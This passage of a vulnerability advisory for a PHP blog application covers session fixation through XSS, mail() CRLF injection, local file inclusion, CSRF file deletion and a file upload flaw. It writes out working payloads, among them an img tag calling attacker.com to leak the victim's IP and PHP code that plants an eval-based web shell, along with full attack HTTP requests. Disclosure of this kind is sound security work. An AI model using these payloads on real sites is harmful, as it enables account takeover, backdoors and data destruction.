&nbsp;&nbsp;33|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;(&nbsp;true&nbsp;);
&nbsp;&nbsp;34|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;35|&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;36|&nbsp;}

&nbsp;&nbsp;After,&nbsp;the&nbsp;attacker,&nbsp;who&nbsp;knows&nbsp;the&nbsp;session&nbsp;id,&nbsp;just
&nbsp;&nbsp;have&nbsp;to&nbsp;use&nbsp;it&nbsp;to&nbsp;be&nbsp;logged&nbsp;in&nbsp;as&nbsp;the&nbsp;victim's&nbsp;account.
&nbsp;&nbsp;But&nbsp;in&nbsp;our&nbsp;case,&nbsp;he&nbsp;must&nbsp;also&nbsp;know&nbsp;the&nbsp;victim's&nbsp;IP.
&nbsp;&nbsp;I'll&nbsp;demonstrate&nbsp;how&nbsp;to&nbsp;get&nbsp;administrator&nbsp;rights&nbsp;even
&nbsp;&nbsp;if&nbsp;the&nbsp;victim&nbsp;has&nbsp;a&nbsp;protection&nbsp;against&nbsp;XSS&nbsp;(NoScript
&nbsp;&nbsp;Firefox&nbsp;plugin&nbsp;for&nbsp;example).&nbsp;First,&nbsp;the&nbsp;attacker&nbsp;will
&nbsp;&nbsp;fix&nbsp;the&nbsp;victim's&nbsp;session&nbsp;id&nbsp;by&nbsp;setting&nbsp;a&nbsp;cookie&nbsp;to
&nbsp;&nbsp;the&nbsp;victim.&nbsp;Then&nbsp;he'll&nbsp;also&nbsp;force&nbsp;the&nbsp;victim's&nbsp;web
&nbsp;&nbsp;browser&nbsp;to&nbsp;establish&nbsp;a&nbsp;connexion&nbsp;to&nbsp;a&nbsp;script&nbsp;that
&nbsp;&nbsp;will&nbsp;get&nbsp;the&nbsp;victim's&nbsp;IP.&nbsp;Take&nbsp;a&nbsp;look&nbsp;at&nbsp;this&nbsp;schema:

&nbsp;+----------------------------------------------------------+
&nbsp;|&nbsp;The&nbsp;attacker&nbsp;post&nbsp;a&nbsp;comment&nbsp;using&nbsp;the&nbsp;XSS&nbsp;vulnerability.&nbsp;|
&nbsp;|&nbsp;The&nbsp;code&nbsp;which&nbsp;will&nbsp;be&nbsp;executed&nbsp;on&nbsp;the&nbsp;client&nbsp;browser&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;|&nbsp;will&nbsp;set&nbsp;the&nbsp;&quot;sid&quot;&nbsp;cookie,&nbsp;it&nbsp;will&nbsp;also&nbsp;force&nbsp;the&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;|&nbsp;victim's&nbsp;web&nbsp;browser&nbsp;to&nbsp;send&nbsp;an&nbsp;HTTP&nbsp;packet&nbsp;to&nbsp;a&nbsp;script&nbsp;&nbsp;|
&nbsp;|&nbsp;that&nbsp;will&nbsp;mail&nbsp;the&nbsp;victim's&nbsp;IP&nbsp;to&nbsp;the&nbsp;attacker.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;+----------------------------------------------------------+
&nbsp;|
&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;+---------------------------------------------------+
&nbsp;+--&gt;&nbsp;|&nbsp;&lt;meta&nbsp;http-equiv=Set-Cookie&nbsp;content=sid=MD5HERE;&gt;&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&lt;img&nbsp;src=http://attacker.com/getip_and_mail.php&gt;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;+---------------------------------------------------+
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;+-------------------------------------------------+&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;|&nbsp;The&nbsp;victim,&nbsp;which&nbsp;is&nbsp;logged&nbsp;in,&nbsp;have&nbsp;to&nbsp;see&nbsp;the&nbsp;|&nbsp;&lt;--+
&nbsp;&nbsp;&nbsp;|&nbsp;comments&nbsp;page.&nbsp;After&nbsp;saw&nbsp;it,&nbsp;the&nbsp;victim&nbsp;will&nbsp;be&nbsp;|&nbsp;
&nbsp;&nbsp;&nbsp;|&nbsp;logged&nbsp;out.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;+-------------------------------------------------+
&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;+------------------------------------------+
&nbsp;&nbsp;&nbsp;+--&gt;&nbsp;|&nbsp;The&nbsp;victim&nbsp;try&nbsp;to&nbsp;log&nbsp;in.&nbsp;Now&nbsp;that&nbsp;she's&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;logged&nbsp;in,&nbsp;the&nbsp;session&nbsp;id&nbsp;set&nbsp;by&nbsp;the&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;attacker&nbsp;is&nbsp;registered&nbsp;on&nbsp;the&nbsp;server.&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;+------------------------------------------+
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;+--------------------------------------------+&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;|&nbsp;Now&nbsp;the&nbsp;attacker&nbsp;just&nbsp;have&nbsp;to&nbsp;send&nbsp;an&nbsp;HTTP&nbsp;|&lt;--+
&nbsp;&nbsp;|&nbsp;packet&nbsp;which&nbsp;contains&nbsp;the&nbsp;session&nbsp;id&nbsp;and&nbsp;a&nbsp;|
&nbsp;&nbsp;|&nbsp;special&nbsp;header&nbsp;with&nbsp;the&nbsp;victim's&nbsp;IP.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;|&nbsp;The&nbsp;attacker&nbsp;is&nbsp;logged&nbsp;in&nbsp;as&nbsp;the&nbsp;victim's&nbsp;&nbsp;|
&nbsp;&nbsp;|&nbsp;account.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;+--------------------------------------------+

&nbsp;&nbsp;As&nbsp;you&nbsp;can&nbsp;see,&nbsp;even&nbsp;if&nbsp;the&nbsp;victim&nbsp;is&nbsp;protected&nbsp;against
&nbsp;&nbsp;XSS,&nbsp;it's&nbsp;always&nbsp;possible&nbsp;to&nbsp;get&nbsp;adminitrator&nbsp;rights&nbsp;with
&nbsp;&nbsp;this&nbsp;type&nbsp;of&nbsp;attack,&nbsp;we&nbsp;juste&nbsp;use&nbsp;the&nbsp;&quot;meta&quot;&nbsp;and&nbsp;&quot;img&quot;&nbsp;tags.



&nbsp;&nbsp;IV&nbsp;-&nbsp;MAIL()&nbsp;CRLF&nbsp;INJECTION

&nbsp;&nbsp;User's&nbsp;variables&nbsp;are&nbsp;not&nbsp;checked&nbsp;before&nbsp;be&nbsp;used&nbsp;in&nbsp;the&nbsp;mail()
&nbsp;&nbsp;function.&nbsp;The&nbsp;file&nbsp;&quot;comment_add_cgi.php&quot;&nbsp;call&nbsp;the
&nbsp;&nbsp;write_comment()&nbsp;function&nbsp;with&nbsp;the&nbsp;following&nbsp;parameters:

&nbsp;&nbsp;214|&nbsp;$comment_name&nbsp;=&nbsp;sb_stripslashes($_POST['comment_name']);
&nbsp;&nbsp;215|&nbsp;$comment_email&nbsp;=&nbsp;sb_stripslashes($_POST['comment_email']);
&nbsp;&nbsp;216|&nbsp;$comment_url&nbsp;=&nbsp;sb_stripslashes($_POST['comment_url']);
&nbsp;&nbsp;217|&nbsp;$comment_text&nbsp;=&nbsp;sb_stripslashes($_POST['comment_text']);
&nbsp;&nbsp;218|&nbsp;
&nbsp;&nbsp;219|&nbsp;$result&nbsp;=&nbsp;write_comment($_POST[&nbsp;'y'&nbsp;],$_POST[&nbsp;'m'&nbsp;],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_POST['entry'&nbsp;],
&nbsp;&nbsp;220|&nbsp;		$comment_name,
&nbsp;&nbsp;221|&nbsp;		$comment_email,
&nbsp;&nbsp;222|&nbsp;		$comment_url,
&nbsp;&nbsp;223|&nbsp;		$comment_text,
&nbsp;&nbsp;224|&nbsp;		$_POST[&nbsp;'user_ip'&nbsp;],
&nbsp;&nbsp;225|&nbsp;		$moderationFlag,
&nbsp;&nbsp;226|&nbsp;		time()&nbsp;);

&nbsp;&nbsp;Then&nbsp;the&nbsp;function&nbsp;clean_post_text()&nbsp;is&nbsp;applied&nbsp;to&nbsp;$comment_email.
&nbsp;&nbsp;But&nbsp;this&nbsp;function&nbsp;doesn't&nbsp;protect&nbsp;against&nbsp;CRLF&nbsp;Injection,&nbsp;this
&nbsp;&nbsp;will&nbsp;not&nbsp;replace&nbsp;the&nbsp;\r&nbsp;and&nbsp;\n&nbsp;chars.&nbsp;Take&nbsp;a&nbsp;look&nbsp;at&nbsp;the&nbsp;file
&nbsp;&nbsp;&quot;sb_comments.php&quot;:

&nbsp;&nbsp;471|&nbsp;function&nbsp;write_comment($y,$m,$entry,$comment_name,$comment_email
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;525|&nbsp;if&nbsp;(&nbsp;$comment_email&nbsp;!=&nbsp;''&nbsp;)&nbsp;{
&nbsp;&nbsp;526|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$save_data[&nbsp;'EMAIL'&nbsp;]&nbsp;=&nbsp;clean_post_text(&nbsp;$comment_email&nbsp;);
&nbsp;&nbsp;527|&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;584|&nbsp;//&nbsp;Send&nbsp;the&nbsp;Email
&nbsp;&nbsp;585|&nbsp;if&nbsp;(&nbsp;array_key_exists(&nbsp;'EMAIL',&nbsp;$save_data&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;586|&nbsp;&nbsp;&nbsp;sb_mail(&nbsp;$save_data[&nbsp;'EMAIL'&nbsp;],&nbsp;$blog_config[&nbsp;'blog_email'&nbsp;],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$subject,&nbsp;$body,&nbsp;false&nbsp;);
&nbsp;&nbsp;587|&nbsp;}&nbsp;

&nbsp;&nbsp;The&nbsp;goal&nbsp;of&nbsp;the&nbsp;sb_mail()&nbsp;function&nbsp;is&nbsp;to&nbsp;send&nbsp;mass&nbsp;emails.
&nbsp;&nbsp;As&nbsp;you&nbsp;can&nbsp;see&nbsp;belows,&nbsp;there&nbsp;is&nbsp;no&nbsp;protection&nbsp;against
&nbsp;&nbsp;$save_data[&nbsp;'EMAIL'&nbsp;].

&nbsp;&nbsp;&nbsp;45|&nbsp;	function&nbsp;sb_mail&nbsp;($from,&nbsp;$to,&nbsp;$subject,&nbsp;$body,&nbsp;$text=true,&nbsp;$priority=3)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;69|&nbsp;	$headers&nbsp;.=&nbsp;'From:&nbsp;'&nbsp;.&nbsp;$from&nbsp;.&nbsp;&quot;&nbsp;\r\n&quot;;
&nbsp;&nbsp;&nbsp;70|&nbsp;&nbsp;$headers&nbsp;.=&nbsp;'Reply-To:&nbsp;'&nbsp;.&nbsp;$from&nbsp;.&nbsp;&quot;&nbsp;\r\n&quot;;
&nbsp;&nbsp;&nbsp;71|&nbsp;&nbsp;$headers&nbsp;.=&nbsp;'Return-Path:&nbsp;'&nbsp;.&nbsp;$from&nbsp;.&nbsp;&quot;&nbsp;\r\n&quot;;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;&nbsp;76|&nbsp;&nbsp;ini_set('sendmail_from',&nbsp;$from);
&nbsp;&nbsp;&nbsp;77|&nbsp;&nbsp;for&nbsp;(&nbsp;$j=0;&nbsp;$j&nbsp;&lt;&nbsp;count($to_array);&nbsp;$j++&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;78|&nbsp;&nbsp;$result&nbsp;=&nbsp;mail(&nbsp;$to_array[$j],&nbsp;sb_stripslashes($subject),
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sb_stripslashes($body),&nbsp;$headers&nbsp;);
&nbsp;&nbsp;&nbsp;79|&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;80|&nbsp;ini_restore('sendmail_from');

&nbsp;&nbsp;So&nbsp;an&nbsp;attacker&nbsp;can&nbsp;perform&nbsp;a&nbsp;CRLF&nbsp;injection&nbsp;attack&nbsp;into&nbsp;the&nbsp;mail()
&nbsp;&nbsp;function,&nbsp;it&nbsp;will&nbsp;probably&nbsp;be&nbsp;used&nbsp;by&nbsp;spammers.



&nbsp;&nbsp;V&nbsp;-&nbsp;LOCAL&nbsp;FILE&nbsp;INCLUSION&nbsp;(+CSRF)

&nbsp;&nbsp;There&nbsp;is&nbsp;an&nbsp;LFI&nbsp;vulnerability&nbsp;(admin&nbsp;rights&nbsp;needed)
&nbsp;&nbsp;in&nbsp;the&nbsp;file&nbsp;&quot;languages_cgi.php&quot;:

&nbsp;&nbsp;76|&nbsp;	if&nbsp;(&nbsp;array_key_exists(&nbsp;'store_data',&nbsp;$_GET&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;77|&nbsp;	
&nbsp;&nbsp;78|&nbsp;	//&nbsp;Store&nbsp;all&nbsp;the&nbsp;data&nbsp;from&nbsp;language&nbsp;2
&nbsp;&nbsp;79|&nbsp;	require_once('languages/'&nbsp;.&nbsp;$_GET[&nbsp;'lang2'&nbsp;]&nbsp;.&nbsp;'/strings.php');

&nbsp;&nbsp;This&nbsp;will&nbsp;require&nbsp;magic_quotes_gpc=Off.&nbsp;Because&nbsp;they&nbsp;use&nbsp;the
&nbsp;&nbsp;GET&nbsp;method,&nbsp;there's&nbsp;a&nbsp;CSRF&nbsp;vulnerability&nbsp;too.&nbsp;For&nbsp;each&nbsp;new
&nbsp;&nbsp;comments,&nbsp;a&nbsp;new&nbsp;text&nbsp;file&nbsp;is&nbsp;created.&nbsp;The&nbsp;structure&nbsp;of&nbsp;the&nbsp;file
&nbsp;&nbsp;like&nbsp;this:

&nbsp;&nbsp;VERSION|0.4.8
&nbsp;&nbsp;|NAME|&lt;my_name&gt;
&nbsp;&nbsp;|DATE|1188078694
&nbsp;&nbsp;|CONTENT|&lt;my_comment&gt;
&nbsp;&nbsp;|EMAIL|&lt;my_email&gt;
&nbsp;&nbsp;|IP-ADDRESS|&lt;my_ip_or_xss&gt;
&nbsp;&nbsp;|MODERATIONFLAG|H

&nbsp;&nbsp;Now&nbsp;imagine&nbsp;that&nbsp;an&nbsp;attacker&nbsp;use&nbsp;the&nbsp;XSS&nbsp;vulnerability&nbsp;to&nbsp;post
&nbsp;&nbsp;php&nbsp;code&nbsp;and&nbsp;html&nbsp;tags&nbsp;which&nbsp;will&nbsp;make&nbsp;the&nbsp;admin&nbsp;sent&nbsp;an&nbsp;HTTP
&nbsp;&nbsp;request&nbsp;to&nbsp;exploit&nbsp;the&nbsp;LFI&nbsp;vuln.&nbsp;The&nbsp;XSS&nbsp;code&nbsp;will&nbsp;look's&nbsp;like
&nbsp;&nbsp;this:

&nbsp;&nbsp;&lt;!---&nbsp;&lt;?php
&nbsp;&nbsp;$handle&nbsp;=&nbsp;fopen('./themes/back.php',&nbsp;'w+');
&nbsp;&nbsp;fwrite($handle,&nbsp;'&lt;?php&nbsp;@eval($_SERVER[HTTP_SHELL]);&nbsp;?&gt;');
&nbsp;&nbsp;fclose($handle);
&nbsp;&nbsp;mail('[email protected]',&nbsp;'hey',&nbsp;'code&nbsp;executed');
&nbsp;&nbsp;exit();
&nbsp;&nbsp;/*&nbsp;---&gt;
&nbsp;&nbsp;&lt;img&nbsp;src=http://&lt;site&gt;/languages_cgi.php?store_data=1&amp;lang2=
&nbsp;&nbsp;../content/07/07/entry070727-161718/comments/comment070825-235134.txt%00&gt;
&nbsp;&nbsp;&lt;!---&nbsp;*/
&nbsp;&nbsp;?&gt;&nbsp;---&gt;

&nbsp;&nbsp;In&nbsp;order&nbsp;to&nbsp;exploit&nbsp;this,&nbsp;the&nbsp;attacker&nbsp;must&nbsp;know&nbsp;where&nbsp;the&nbsp;new
&nbsp;&nbsp;file&nbsp;will&nbsp;be&nbsp;created.&nbsp;Let's&nbsp;see&nbsp;the&nbsp;code:

&nbsp;&nbsp;471|&nbsp;&nbsp;&nbsp;function&nbsp;write_comment&nbsp;(&nbsp;$y,&nbsp;$m,&nbsp;$entry,&nbsp;$comment_name,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;$comment_email,&nbsp;$comment_url,&nbsp;$comment_text,&nbsp;$user_ip,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;$hold_flag='',&nbsp;$comment_date=null&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;
&nbsp;&nbsp;478|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$basedir&nbsp;=&nbsp;'content/';
&nbsp;&nbsp;479|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$dir&nbsp;=&nbsp;$basedir.$y.'/'.$m.'/'.$entry;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;
&nbsp;&nbsp;494|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$dir&nbsp;.=&nbsp;'/comments';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;
&nbsp;&nbsp;506|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$dir&nbsp;&nbsp;.=&nbsp;'/';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;512|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$stamp&nbsp;=&nbsp;date('ymd-His');
&nbsp;&nbsp;513|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$blog_config[&nbsp;'blog_enable_gzip_txt'&nbsp;]&nbsp;)&nbsp;{
&nbsp;&nbsp;514|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$entryFile&nbsp;=&nbsp;$dir.'comment'.$stamp.'.txt.gz';
&nbsp;&nbsp;515|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{
&nbsp;&nbsp;516|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$entryFile&nbsp;=&nbsp;$dir.'comment'.$stamp.'.txt';
&nbsp;&nbsp;517|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;
&nbsp;&nbsp;The&nbsp;variables&nbsp;$y,&nbsp;$m&nbsp;and&nbsp;$entry&nbsp;are&nbsp;sent&nbsp;with&nbsp;the&nbsp;HTTP&nbsp;request.
&nbsp;&nbsp;The&nbsp;filename&nbsp;is&nbsp;decided&nbsp;with&nbsp;the&nbsp;date()&nbsp;function.&nbsp;There&nbsp;is&nbsp;many
&nbsp;&nbsp;ways&nbsp;for&nbsp;know&nbsp;the&nbsp;content&nbsp;returned&nbsp;by&nbsp;$stamp:
&nbsp;&nbsp;-&nbsp;Ask&nbsp;the&nbsp;server&nbsp;by&nbsp;sending&nbsp;an&nbsp;HTTP&nbsp;request&nbsp;(the&nbsp;&quot;Date&quot;&nbsp;header).
&nbsp;&nbsp;-&nbsp;Bruteforce&nbsp;the&nbsp;path&nbsp;(Add&nbsp;several&nbsp;html&nbsp;tags).
&nbsp;&nbsp;-&nbsp;Divide&nbsp;our&nbsp;attack&nbsp;in&nbsp;two&nbsp;parts&nbsp;(filenames&nbsp;are&nbsp;displayed&nbsp;in&nbsp;the&nbsp;html&nbsp;source).

&nbsp;&nbsp;The&nbsp;attacker&nbsp;must&nbsp;also&nbsp;urlencode&nbsp;the&nbsp;content&nbsp;of&nbsp;his&nbsp;XSS,&nbsp;the
&nbsp;&nbsp;HTTP&nbsp;packet&nbsp;will&nbsp;finally&nbsp;look's&nbsp;like&nbsp;this:

&nbsp;&nbsp;POST&nbsp;/comment_add_cgi.php&nbsp;HTTP/1.1
&nbsp;&nbsp;Host:&nbsp;localhost
&nbsp;&nbsp;Connection:&nbsp;keep-alive
&nbsp;&nbsp;Cookie:&nbsp;PHPSESSID=&lt;SID&gt;
&nbsp;&nbsp;Client-IP:&nbsp;&lt;HTML_AND_PHP_CONTENT&gt;
&nbsp;&nbsp;Content-Type:&nbsp;application/x-www-form-urlencoded
&nbsp;&nbsp;Content-Length:&nbsp;&lt;LEN&gt;
&nbsp;&nbsp;y=&lt;Y&gt;&amp;m=&lt;M&gt;&amp;entry=&lt;ENTRY&gt;&amp;comment_name=Hacker
&nbsp;&nbsp;&amp;comment_email=my%40you.com&amp;comment_url=&amp;user_ip=
&nbsp;&nbsp;&lt;HTML_AND_PHP_CONTENT_URLENCODED&gt;
&nbsp;&nbsp;&amp;style_dropdown=--&amp;comment_text=Hello&amp;comment_capcha
&nbsp;&nbsp;=128619&amp;submit=%A0Post+Comment%A0

&nbsp;&nbsp;Now&nbsp;the&nbsp;attacker&nbsp;have&nbsp;to&nbsp;wait&nbsp;until&nbsp;the&nbsp;admin&nbsp;see&nbsp;his&nbsp;comment.



&nbsp;&nbsp;VI&nbsp;-&nbsp;FILE&nbsp;DELETION&nbsp;(+CSRF)

&nbsp;&nbsp;There&nbsp;is&nbsp;a&nbsp;CSRF&nbsp;vulnerability&nbsp;which&nbsp;can&nbsp;lead&nbsp;to&nbsp;file
&nbsp;&nbsp;deletion.&nbsp;Let's&nbsp;see&nbsp;the&nbsp;code&nbsp;of&nbsp;&quot;trackback_delete_cgi.php&quot;:

&nbsp;&nbsp;22|&nbsp;if&nbsp;(&nbsp;array_key_exists(&nbsp;'trackback',&nbsp;$_GET&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;23|&nbsp;	$ok&nbsp;=&nbsp;delete_trackback(&nbsp;$_GET[&nbsp;'trackback'&nbsp;]&nbsp;);	
&nbsp;&nbsp;24|&nbsp;}

&nbsp;&nbsp;So&nbsp;if&nbsp;the&nbsp;variable&nbsp;&quot;trackback&quot;&nbsp;is&nbsp;set&nbsp;with&nbsp;the&nbsp;GET&nbsp;method,&nbsp;
&nbsp;&nbsp;the&nbsp;delete_trackback()&nbsp;function&nbsp;is&nbsp;called.&nbsp;The&nbsp;code&nbsp;of&nbsp;
&nbsp;&nbsp;this&nbsp;function&nbsp;is&nbsp;situated&nbsp;in&nbsp;&quot;sb_trackback.php&quot;:

&nbsp;&nbsp;229|&nbsp;	function&nbsp;delete_trackback&nbsp;(&nbsp;$entryFile&nbsp;)&nbsp;{
&nbsp;&nbsp;230|&nbsp;		//&nbsp;Delete&nbsp;the&nbsp;old&nbsp;file
&nbsp;&nbsp;231|&nbsp;		if&nbsp;(&nbsp;file_exists(&nbsp;$entryFile&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;232|&nbsp;			$ok&nbsp;=&nbsp;sb_delete_file(&nbsp;$entryFile&nbsp;);
&nbsp;&nbsp;233|&nbsp;		}

&nbsp;&nbsp;If&nbsp;the&nbsp;file&nbsp;exists,&nbsp;the&nbsp;function&nbsp;sb_delete_file()&nbsp;is&nbsp;called,
&nbsp;&nbsp;with&nbsp;the&nbsp;parameter&nbsp;$_GET['trackback'].&nbsp;The&nbsp;source&nbsp;code&nbsp;
&nbsp;&nbsp;of&nbsp;this&nbsp;function&nbsp;is&nbsp;situated&nbsp;in&nbsp;the&nbsp;file&nbsp;&quot;sb_fileio.php&quot;:

&nbsp;&nbsp;171|&nbsp;&nbsp;&nbsp;function&nbsp;sb_delete_file&nbsp;(&nbsp;$filename&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;175|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;clearstatcache();
&nbsp;&nbsp;176|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;file_exists(&nbsp;$filename&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;177|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$result&nbsp;=&nbsp;@unlink(&nbsp;$filename&nbsp;);
&nbsp;&nbsp;178|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;There&nbsp;is&nbsp;no&nbsp;verification&nbsp;before&nbsp;deleting&nbsp;the&nbsp;file.&nbsp;So&nbsp;we
&nbsp;&nbsp;can&nbsp;delete&nbsp;any&nbsp;files&nbsp;on&nbsp;the&nbsp;server.&nbsp;The&nbsp;HTTP&nbsp;packet&nbsp;sent
&nbsp;&nbsp;by&nbsp;the&nbsp;attacker&nbsp;will&nbsp;look's&nbsp;like&nbsp;this:

&nbsp;&nbsp;GET&nbsp;/trackback_delete_cgi.php?trackback=&lt;FILE&gt;&nbsp;HTTP/1.1\r\n
&nbsp;&nbsp;Host:&nbsp;localhost\r\n
&nbsp;&nbsp;Connection:&nbsp;keep-alive\r\n\r\n

&nbsp;&nbsp;Admin&nbsp;right's&nbsp;are&nbsp;needed&nbsp;to&nbsp;delete&nbsp;files,&nbsp;but&nbsp;because
&nbsp;&nbsp;it's&nbsp;also&nbsp;a&nbsp;CRLF&nbsp;vulnerability,&nbsp;we&nbsp;can&nbsp;use&nbsp;it&nbsp;in&nbsp;our&nbsp;XSS,
&nbsp;&nbsp;then&nbsp;so&nbsp;admin&nbsp;right's&nbsp;aren't&nbsp;needed&nbsp;for&nbsp;the&nbsp;attacker.



&nbsp;&nbsp;VII&nbsp;-&nbsp;FILE&nbsp;UPLOAD&nbsp;VULNERABILITY

&nbsp;&nbsp;When&nbsp;we're&nbsp;admin,&nbsp;we&nbsp;can&nbsp;upload&nbsp;emoticons.
&nbsp;&nbsp;Let'see&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;function&nbsp;upload_emoticons()
&nbsp;&nbsp;which&nbsp;is&nbsp;situated&nbsp;in&nbsp;the&nbsp;file&nbsp;&quot;emoticons.php&quot;:

&nbsp;&nbsp;36|&nbsp;function&nbsp;upload_emoticons()&nbsp;{
&nbsp;&nbsp;37|&nbsp;	//&nbsp;Emoticon&nbsp;upload&nbsp;form&nbsp;results
&nbsp;&nbsp;38|&nbsp;	$path&nbsp;=&nbsp;'images/emoticons';
&nbsp;&nbsp;39|&nbsp;	$uploaddir&nbsp;=&nbsp;$path;
&nbsp;&nbsp;40|&nbsp;	
&nbsp;&nbsp;41|&nbsp;	$ok&nbsp;=&nbsp;false;
&nbsp;&nbsp;42|&nbsp;	if&nbsp;(&nbsp;$_FILES[&nbsp;'user_emot'&nbsp;][&nbsp;'error'&nbsp;]&nbsp;==&nbsp;0&nbsp;)&nbsp;{
